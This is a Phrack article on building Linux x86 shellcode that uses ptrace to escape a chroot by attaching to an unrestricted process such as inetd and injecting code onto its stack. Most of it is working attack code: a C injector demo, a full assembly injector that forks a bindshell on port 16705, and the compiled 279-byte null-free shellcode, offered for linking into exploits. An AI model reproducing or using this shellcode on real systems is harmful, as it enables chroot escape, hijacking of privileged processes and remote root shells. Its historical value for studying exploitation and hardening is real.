Title : Building ptrace injecting shellcodes
Author : anonymous author
==Phrack Inc.==
Volume 0x0b, Issue 0x3b, Phile #0x0c of 0x12
|=---------------=[ Building ptrace injecting shellcodes ]=--------------=|
|=-----------------------------------------------------------------------=|
|=------------=[ anonymous author <p59_0c@author.phrack.org ]=-----------=|
---[ Contents
1 - Testing environment
2 - Why we should do ptrace injecting shellcode ?
3 - What does ptrace
3.1 - Requirement
3.2 - How does the library make the call
4 - Injecting code in a process - C code
4.1 - The stack is our friend
4.2 - Code to inject
4.3 - Our first C code
5 - First try to shellcodize it
5.1 When you need somebody to trace
5.2 Waiting (for love ?)
5.3 Registers where are you ?
5.4 Upload in progress
5.5 You'll be a man, my son.
6 - References and greetings
---[ 1 - Testing environment
First of all, I've to set the rules for my playground. I used to test all
these techniques under linux 2.4.18 i386 with executable stack.
They may work under any linux releases, excepted the nonexec-stack ones,
due to the concept of the injection (On the stack).
By modifying a little bit these techniques it shoud be possible to exploit
any OS on any architecture, as long they support the ptrace() system call.
---[ 2 - Why we should do ptrace injecting shellcode ?
Starting in some of the 2.4.x kernel series, linux chroot is no longer
breakable by the good old well known method.(using chroot() tricks).
The linux chroot now really restricts the VFS usage, and a root shell on a
chrooted process may (theorically) be unusable for a cracker, except by
modifying (by example on a FTP server) the ftp tree.
An uid of zero may allow the cracker to do some others things that are not
restricted by the VFS on a standard 2.4 kernel :
- Changing some kernel parameters (time of day, etc...).
- Insert a kernel module (may be exploitable, but it is very hard to
include a shellcode due to space restriction. It had been used in a wuftpd
2.5 exploit, by uploading a kernel backdoor and a staticaly linked insmod.
That's way much complicated to do successfuly than our tricks. )
- Somes VFS related thingies like using opens file descriptors.
- Debug any process on the system.
There is a huge vulnerability of the chroot system, which is corrected by
some security patches available on the net. A root user in a chrooted env
is still ptrace-capable on any process on the system (except init,
of course).
This technique is also generic (doesn't use open fd's, may be usable even
on non root processes) and a chrooted apache may infect fingerd as an
exemple.
Here comes the idea to create a ptrace shellcode. We may, with this
shellcode, trace an unrestricted process and inject into it a second
shellcode, which runs a bindshell in our example.
Here is what we want for this ptrace shellcode :
-Relative small size (must be usable as a real shellcode). I saw in some
exploits (like the 7350wu one) a little smaller shellcode doing a read
(0,%esp,shellcode_len), and I thought it as a really "good-idea (TM)" to
inject a big shellcode. So this parameter is not so critical.
-Must be runable more than once in a short laps of time.
If the first exploitation attempt failed (e.g. port already binded), the
traced process must not crash. (in the wuftpd case, if we inject malicious
code in inetd, it should let it listen for ftp connections)
-The selection of the target process may be most of the time the parent
process (inetd for a ftp server) which usually has full root access. We
can also try all pid, starting from 2, until we find something traceable.
-We can't lookup into /proc for any process to trace.
These rules can be fulfilled, and are enough for most exploitation cases,
I think.
---[ 3 - What does ptrace
3.1 - Requirement
You may know that the ptrace system call has been created for tracing and
debugging process within usermode.
A process may be ptraced by only one process at a time, and only by a pid
owned by the same user, or by root.
Under linux, ptrace commands are all implemented by the ptrace()
function/syscall, with four parameters. The prototype is there :
#include <sys/ptrace.h>
long int ptrace(enum __ptrace_request request, pid_t pid,
void * addr, void * data)
'request' is a symbolic constant declared in sys/ptrace.h . We shall use
those :
PTRACE_ATTACH :
Attach to the process pid.
PTRACE_DETACH :
ugh, Detach from the process pid. Never forget to do that, or
your traced process will stay in stopped mode, which is
unrecoverable remotely.
PTRACE_GETREGS :
This command copy the process registers into the struct
pointed by data (addr is ignored). This structure is struct
user_regs_struct defined as this, in asm/user.h :
struct user_regs_struct {
long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
long orig_eax, eip;
unsigned short cs, __cs;
long eflags, esp;
unsigned short ss, __ss;
};
PTRACE_SETREGS :
This command has the opposite meaning of PTRACE_GETREGS, with
same arguments
PTRACE_POKETEXT :
This command copies 32 bits from the address pointed by data
in the addr address of the traced process. This is equivalent
to PTRACE_POKEDATA.
An important thing when you attach a pid is that you have to wait for the
traced process to be stopped, and so have to wait for the SIGCHLD
signal.
wait(NULL) does this perfectly (implemented in the shellcode by waitpid).
3.2 - How does the library make the call
As we are writing asm code, we have to know how to call directly the
ptrace system call. Little tests may show us the way the library uses to
wrap the syscalls, and simply :
eax is SYS_ptrace (26 decimal)
ebx is request (e.g. PTRACE_ATTACH is 16)
ecx is pid
edx is addr
esi is data
in error case, -1 is stored in eax.
---[ 4 - Injecting code in a process - C code
4.1 - The stack is our friend
I've seen some injection mechanism used by some ptrace() exploits for
linux, which injected a standard shellcode into the memory area pointed
by %eip. That's the lazy way of doing injection, since the target process
is screwed up and can't be used again. (crashes or doesn't fork)
We have to find another way to execute our code in the target process.
That's what I was thinking and I found this :
1- Get the current eip of the process, and the esp.
2- Decrement esp by four
3- Poke eip address at the esp address.
4- Inject the shellcode into esp - 1024 address (Not directly
before the space pointed by esp, because some shellcodes
use the push instruction)
5- Set register eip as the value of esp - 1024
6- Invoke the SETREGS method of ptrace
7- Detach the process and let it open a root shell for you :)
The reason of non-usability on systems with nonexec stack is that the
shellcode is uploaded onto the stack. That's a /feature/, not a bug.
I've heard of methods saving the memory context of the traced process,
uploading shellcode, wait it to finish (usually after the fork) and then
restoring the old state of the traced process.
That's a way, but I don't think it is really efficient because modern
non-exec patches also avoid ptracing of unrestricted processes. (At least
grsec does that.)
The target stack may look as this :
[DOWN][program stack][old_eip][craps for 1024 bytes][shellcode][UP]
^> Original esp points here new eip<^
new<^>esp points here
Something important to do before the exploitation is to put two nops bytes
before the shellcode. Reason is simple : if ptrace has interrupted a syscall
being executed, the kernel will subtract two bytes from eip after the
PTRACE_DETACH to restart the syscall.
4.2 - Code to inject
The code to inject has to work peacefully with the stack we have set up
for it : it may fork(), and let the original process continue its job.
The new process may launch a bindshell !
Here's the code of s1.S , compilable with gcc :
/* all that part has to be done into the injected process */
/* in other word, this is the injected shellcode */
.globl injected_shellcode
injected_shellcode:
// ret location has been pushed previously
nop
nop
pusha // save before anything
xor %eax,%eax
mov $0x02,%al //sys_fork
int $0x80 //fork()
xor %ebx,%ebx
cmp %eax,%ebx // father or son ?
je son // I'm son
//here, I'm the father, I've to restore my previous state
father:
popa
ret /* return address has been pushed on the stack previously */
// code finished for father
son: /* standard shellcode, at your choice */
.string ""
local@darkside:~/dev/ptrace$ gcc -c s1.S
Explanations :
The first two nops are the nops I've discussed just before, because in my
final shellcode I choose to decrement the destination buffer source
address by two.
The pusha saves all the registers on the stack, so the process may restore
them just after the fork. (I say eax and ebx)
If the return value of fork is zero, this is the son being executed.
There we insert any style of shellcode.
If the return value is not zero (but a pid), restore the registers and the
previously saved eip. The program may continue as if nothing has happened.
4.3 - Our first C code
Lot of theory, now a little practical example. Here is a program which
will fork, attach its son, inject it the code, let it run and after kill it.
So, there is p2.c :
#include <stdio.h>
#include <sys/ptrace.h>
#include <linux/user.h>
#include <signal.h>
typedef long int pid_t;
void injected_shellcode();
char *hello_shellcode=
"\x31\xc0\xb0\x04\xeb\x0f\x31\xdb\x43\x59"
"\x31\xd2\xb2\x0d\xcd\x80\xa1\x78\x56\x34"
"\x12\xe8\xec\xff\xff\xff\x48\x65\x6c\x6c"
"\x6f\x2c\x57\x6f\x72\x6c\x64\x20\x21" ;
/* Prints hello. What a deal ! */
char *shellcode;
int child(){
while(1){
write(2,".",1);
sleep(1);
}
return 0;
}
int father (pid_t pid){
int error;
int i=0;
int ptr;
int begin;
struct user_regs_struct data;
if (error=ptrace(PTRACE_ATTACH,pid,NULL,NULL))
perror("attach");
waitpid(pid,NULL,0);
if(error=ptrace(PTRACE_GETREGS,pid,&data,&data))
perror("getregs");
printf("%%eip : 0x%.8lx\n",data.eip);
printf("%%esp : 0x%.8lx\n",data.esp);
data.esp -= 4;
ptrace(PTRACE_POKETEXT,pid,data.esp,data.eip);
ptr=begin=data.esp-1024;
printf("Inserting shellcode into %.8lx\n",begin);
data.eip=(long)begin+2;
ptrace(PTRACE_SETREGS,pid,&data,&data);
while(i<strlen(shellcode)){
ptrace(PTRACE_POKETEXT,pid,ptr,(int)* (int *)
(shellcode+i));
i+=4;
ptr+=4;
}
ptrace (PTRACE_DETACH,pid,NULL,NULL);
return 0;
}
int main(int argc,char **argv){
pid_t pid=0;
if(argc>1)
pid=atoi(argv[1]);
shellcode=malloc( strlen((char*) injected_shellcode) +
strlen(hello_shellcode) + 4);
strcpy(shellcode,(char *) injected_shellcode);
strcat(shellcode,(char *) hello_shellcode);
printf("p2 : trying to launch shellcode on forked process\n");
if(pid==0)
pid=fork();
if (pid){
printf("I'm the father\n");
sleep(2);
father(pid);
sleep(2);
kill(pid,9);
wait(NULL);
}else{
printf("I'm the child\n");
child();
}
return 0;
}
Compile all that with gcc -o p2 p2.c s1.S
and admire my cut & paste skillz
local@darkside:~/dev/ptrace$ ./p2
p2 : trying to launch shellcode on forked process
I'm the father
I'm the child
...%eip : 0x400c0a11
%esp : 0xbffff470
Inserting shellcode into bffff06c
.Hello,World !.
It really happened. the .... process forked and then printed
"Hello, world!".
5 - First try to shellcodize it
Before doing it, we have to remember our rules. I'll program it without
really optimizing it in size (I let bighawk or pr1 do that) but designing
with pre-compiler conditional assemble.
gcc -DLONG for a very careful shellcode (checks etc...)
gcc -DSHORT for a very tiny shellcode (which does the minimum but unsafe).
So, if size really matters, we can exit(0) simply by jumping anywhere, or
if size does not matter at all, we can make draconian tests.
I will use at&t syntax, compilable with gcc.
If you don't like it, a good (and big) awk script may do the trick.
5.1 When you need some body to trace
A basic approach is first to set the stack pointer to a high value.
We can't be certain that the stack pointer is not less than current eip
(in the case of a stack based overflow).
The easier (and laziest) way to do this is to set esp to 0xbffffe04.
This esp value works on nearly all linux/x86 boxes I've seen, and is near
the stack bottom, but not too much, and doesn't contain a zero.
Then, we get the ppid process with the getppid() syscall. Next, first try
to attach it.
If the attach fails, 99% chances are that the ppid is init.
In this case, we increment the pid until we can attach something.
(Warning, debugging this part of code is not easy at all. When you trace
a process, you become its ppid. In this case, the shellcode will attach
your debugger and a mutual deadlock will appear. Who told "A cool/good
anti-debugger technique ?")
So I included a test for the DEBUG_PID preprocessor variable.
Put there whatever pid you want to inject something in.
Note that the pid is put on the stack, at the 12(%ebp) place. That's
useful because we will need it in nearly all system calls.
5.2 Waiting (for love ?)
Now, little shellcode has to wait for its child. There are two ways of
doing this :
- waitpid(pid,NULL,NULL);
- big big loop;
As I didn't success to make a reasonably short (in time) loop smaller in
size than the syscall, the code contains only the system call.
5.3 Registers where are you ?
The target process is ready to be modified, but the first thing to do with
it is to extract the registers.
The ebp register is saved into esi, and then esi is incremented by 16.
It will be the "data" argument of the ptrace call.
So, after the syscall, target registers are beginning at 16(%ebp).
Interesting registers are :
esp : 76(%ebp)
eip : 64(%ebp)
The register tricks I have described before are in the shellcode source,
but are not so complicated, including the "push"-like instruction to push
the old eip address.
5.4 Upload in progress
"Uploading" the shellcode, or injecting it in the target process, is just
a little loop. The shellcode itself is not really clear because the loop
counter used is esp.
We set esp with the value specified in macro SHELLCODELEN. In edi, we set
the memory address of the injected shellcode in the current process. Edx
contains the target address, previously decremented of two conforming to
our first note about this.
As after the interrupt call, eax must be zero, we can safely use it to test
if esp reached the final state.
5.5 You'll be a man, my son.
We can safely detach the process now. If we forget to detach (laziness or
simply spaceless) the process will remain in interrupted state, which
needs a SIGCONT to launch our bindshell.
After this hard work, shellcode can exit, simply by the exit() syscall
which usually doesn't alarm inetd or such and doesn't create any alarming
note in syslog. (for the cute version, "ret" may be enough to segfault and
so close the process.)
The bindshell I included binds port 0x4141. Remember that two fast
executions of the shellcode may block the port 0x4141 for minutes.
That was quite annoying while coding this.
The shellcode hasn't been optimized in size yet.
You can compile the attached code with
gcc -DLONG -c -o injector.o injector.S
and linking it with your favourite exploit. Code is 100% null-chars free.
I didn't look for newlines, carriage returns, spaces, percents, 0xff,
etc...
---[ 6 - References and greetings
Man page of ptrace() is cool, lucid, informative, and so on.
Intel documentation book 2 : the instructions was an useful book
full of 1-byte-instructions-which-does-everything.
Special greets to the other guys from minithins.net, UNF people, my tender
girlfriend and to at&t who made their own cool asm syntax.
Special thanks too to the channels #fr,#ircs,#!w00nf,#segfault,#unf for
their special support, and especially to double-p ,fozzy and OUAH who corrected
my lame english and gave me some advices.
<injector.s>
/* INJECTOR.S VERSION 1.0 */
/* Injects a shellcode in a process using ptrace system call */
/* Tested on : linux 2.4.18 */
/* NOT SIZE-OPTIMIZED YET */
#define SHELLCODELEN 30
/* That is, size of (the injected shellcode + bindshell)/4 */
#ifndef SHORT
#define LONG
#endif
#ifdef LONG
#undef SHORT
#endif
.text
.globl shellcode
.type shellcode,@function
shellcode:
/* injector begins here */
mov $0xbffffe04,%esp
/* first thing, we have to find our ppid */
xor %eax,%eax
mov $64,%al /* sys_getppid */
int $0x80
#ifdef DEBUG_PID
mov $DEBUG_PID,%ax
#endif
/* put it on the stack */
mov %esp,%ebp /* save the stack in stack pointer */
mov %eax,12(%ebp) /* save the pid there */
/* now we have to do a ptrace */
redo:
xor %eax,%eax
mov $26,%al /* sys_ptrace */
mov 12(%ebp),%ecx
mov %eax,%ebx
mov $0x10,%bl /* PTRACE_ATTACH */
int $0x80 /* do ptrace(PTRACE_ATTACH,getppid(),NULL,NULL); */
xor %ebx,%ebx
cmp %eax,%ebx
je good /* we are not leet enough, or ppid is init */
inc %ecx
mov %ecx,12(%ebp)
jmp redo
good:
/* now we have to do a waitpid(pid,NULL,NULL) */
mov %eax,%edx /* NULL */
mov %ecx,%ebx /* pid */
mov %edx,%ecx /* NULL */
mov $7,%al /* SYS_waitpid */
int $0x80
getregs:
/* now get its registers */
xor %eax,%eax /* Should waitpid return 0 ? never ;) */
xor %ebx,%ebx
mov %ebp,%esi
add $16,%esi /* 16 up of the stack pointer */
mov $12,%bl /* %ebx is zero, PTRACE_GETREGS */
mov 12(%ebp),%ecx /* pid */
mov $26,%al /* %eax is zero. */
/* %edx doesn't contain anything since PTRACE_GETREGS doesn't use addr */
int $0x80
/* so now we have registers in 16(%ebp) */
/* two interresting : %eip and %esp */
/* %eip : (16+48)(%ebp) */
/* %esp : (16+60)(%ebp) */
/* rq : 12(%ebx) contains ppid */
/* 8(%ebx) will contain the eip */
custom_push:
sub $4,76(%ebp) /* dec the esp */
mov 76(%ebp),%edi /* put it in our temp eip */
sub $1036,%di
mov %edi,8(%ebp) /* that's the address where we */
/* shall start to install our code */
/* we need to push the eip at top of the stack */
mov $26,%al
mov $4,%bl /* PTRACE_POKETEXT*/
mov 12(%ebp),%ecx /*ppid */
mov 76(%ebp),%edx /* esp we have decremented */
mov 64(%ebp),%esi /* old eip */
int $0x80 /* what a work for push %eip */
mov %edi ,64(%ebp) /* eip = our code nah, %edi == 8(%ebp) */
/* now put our cool registers set */
setregs:
xor %eax,%eax
xor %ebx,%ebx
mov $26,%al
mov $13,%bl /* PTRACE_SETREGS*/
/* ppid always set so %ecx */
/* %edx ignored */
mov %ebp,%esi
add $16,%esi
int $0x80
/* registers have been updated. now inject the shellcode */
/* %edi : location in memory where we put the shellcode */
jmp start
goback: /* push on the stack the address of the shellcode to inject */
mov %edi,%edx /* addr */
dec %edx
dec %edx
/* returning from syscall, eip goes 2 before current eip */
/* with this trick, it goes on 2 nops */
pop %edi /* data */
xor %eax,%eax
mov $SHELLCODELEN,%al
mov %eax,%esp
mov $4,%bl
loop:
mov $26,%al
mov 12(%ebp),%ecx
mov (%edi),%esi
int $0x80
dec %esp
add $4,%edx /* target shellcode */
add $4,%edi /* local shellcode, source */
cmp %esp,%eax /* Len > 0 ? */
jne loop
detach:
mov $26,%al
xor %ebx,%ebx
mov $0x11,%bl /* PTRACE_DETACH */
mov 12(%ebp),%ecx /* pid */
//xor %edx,%edx
//xor %esi,%esi
int $0x80
/* Now we can exit */
failed:
#ifdef LONG
xor %eax,%eax /* exit silently */
mov %eax,%ebx
mov $1,%al /* sys_exit */
int $0x80 /* die in peace, poor child */
#endif
#ifndef LONG
ret
#endif
start:
call goback
/* all that part has to be done into the injected process */
/* in other word, this is the injected shellcode */
// ret location has been pushed previously
nop
nop
pusha // save before anything by saving registers
xor %eax,%eax
mov $0x02,%al //sys_fork
int $0x80 //fork()
xor %ebx,%ebx
cmp %eax,%ebx // father or son ?
je son // I'm son
//here, I'm the father, I've to restore my previous state
father:
popa
ret
/* code finished for the father */
son: /* standard shellcode, at your choice */
/* Bind shellcode */
lnx_bind:
xor %eax,%eax
cdq /* %edx= 0 */
push %edx /* IPPROTO_TCP */
inc %edx /* SOCK_STREAM */
mov %edx,%ebx /* socket() */
push %edx
inc %edx /* AF_INET */
push %edx
mov %esp,%ecx
mov $102,%al
int $0x80
mov %eax,%edi /* Save the socket in %edi */
cdq /* %edx= sign of %eax = 0 */
inc %ebx /* bind */ /* was 1, become 2 */
push %edx /* 0.0.0.0 addr */
/*change \/ here */
push $0x4141ff02 /* here, change the 0x4141 for the port */
/* /\ */
mov %esp,%esi /* save the address of sockaddr in %esi */
push $16 /* Size of this shit */ //$16
push %esi /* struct sockaddr * */
push %edi /* socket number */
mov %esp,%ecx
/* bind() */
mov $102,%al
int $0x80
/* Erf, I use the previous data on the stack, they are even good enough */
inc %ebx /*3...*/
inc %ebx /*4 */
mov $102,%al
int $0x80 /* Listen(fd,somehug) (somehuge always > 0 so it's good) */
push %esp /* Len */
push %esi /* sockaddr* */
push %edi /* socket */
inc %ebx /* 5 */
mov %esp,%ecx
mov $102,%al
int $0x80 /* accept */
xchg %eax,%ebx /* Save our precious file descriptor */
pop %ecx /* take the value of %edi, that's usualy %ebx-1 */
duploop:
mov $63,%al /* dup2 */
int $0x80
dec %ecx
cmp %ecx,%edx
jle duploop
//jnl loop /* For each file descriptor before %ebx, dup2() it */
/* Std lnx_bin_sh_1 shellcode */
push %edx
push $0x68732f6e
push $0x69622f2f
mov %esp,%ebx
push %edx
push %ebx
mov %esp,%ecx
mov $11, %al
int $0x80
.string ""
</injector.s>
<injector.h>
// compiled with -DLONG
// binds to port 16705
char injector_lnx[]=
"\xbc\x04\xfe\xff\xbf\x31\xc0\xb0\x40\xcd"
"\x80\x89\xe5\x89\x45\x0c\x31\xc0\xb0\x1a"
"\x8b\x4d\x0c\x89\xc3\xb3\x10\xcd\x80\x31"
"\xdb\x39\xc3\x74\x06\x41\x89\x4d\x0c\xeb"
"\xe7\x89\xc2\x89\xcb\x89\xd1\xb0\x07\xcd"
"\x80\x31\xc0\x31\xdb\x89\xee\x83\xc6\x10"
"\xb3\x0c\x8b\x4d\x0c\xb0\x1a\xcd\x80\x83"
"\x6d\x4c\x04\x8b\x7d\x4c\x66\x81\xef\x0c"
"\x04\x89\x7d\x08\xb0\x1a\xb3\x04\x8b\x4d"
"\x0c\x8b\x55\x4c\x8b\x75\x40\xcd\x80\x89"
"\x7d\x40\x31\xc0\x31\xdb\xb0\x1a\xb3\x0d"
"\x89\xee\x83\xc6\x10\xcd\x80\xeb\x34\x89"
"\xfa\x4a\x4a\x5f\x31\xc0\xb0\x1e\x89\xc4"
"\xb3\x04\xb0\x1a\x8b\x4d\x0c\x8b\x37\xcd"
"\x80\x4c\x83\xc2\x04\x83\xc7\x04\x39\xe0"
"\x75\xec\xb0\x1a\x31\xdb\xb3\x11\x8b\x4d"
"\x0c\xcd\x80\x31\xc0\x89\xc3\xb0\x01\xcd"
"\x80\xe8\xc7\xff\xff\xff\x90\x90\x60\x31"
"\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xc3\x74"
"\x02\x61\xc3\x31\xc0\x99\x52\x42\x89\xd3"
"\x52\x42\x52\x89\xe1\xb0\x66\xcd\x80\x89"
"\xc7\x99\x43\x52\x68\x02\xff\x41\x41\x89"
"\xe6\x6a\x10\x56\x57\x89\xe1\xb0\x66\xcd"
"\x80\x43\x43\xb0\x66\xcd\x80\x54\x56\x57"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0"
"\x3f\xcd\x80\x49\x39\xca\x7e\xf7\x52\x68"
"\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
"\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" ;
/*size :279 */
</injector.h>